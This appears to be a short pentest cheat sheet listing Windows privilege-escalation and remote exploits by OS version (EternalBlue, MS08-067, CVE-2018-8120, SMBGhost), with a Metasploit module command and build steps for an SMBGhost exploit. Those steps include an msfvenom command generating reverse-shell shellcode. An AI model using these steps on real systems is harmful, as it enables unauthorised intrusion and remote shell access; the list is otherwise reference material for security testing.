windows exploits

MS08-067 Exploit

MS-17-010 EternalBlue Exploit

MS-16-032 Exploit

Windows 7

MS09-050 'srv2.sys' SMB Code Execution (Python)

MS09-002 Memory Corruption IE7 Exploit

  • msf: use windows/browser/ms09_002_memory_corruption

Windows Server 2008 R2 SP1

  • CVE-2018-8120

  • Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

Windows 7 SP1

  • CVE-2018-8120

    • Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

Windows Server 2008 SP1

Windows Server 2003

Windows Server 2012 R2 Standard

  • MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600

Windows Server 2008 R2

Windows XP SP1

CVE-2020-0796 | smbhghost

REQUIREMENTS:

  • needs smb port:445 open

Steps:

  1. Generate shellcode using msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp

  2. Update shellcode on line 204 file: exploit.cpp

  3. Set TARGET_ARCH and set for RELEASE

  4. Build solution

  5. Run cve-2020-0796-local.exe

Last updated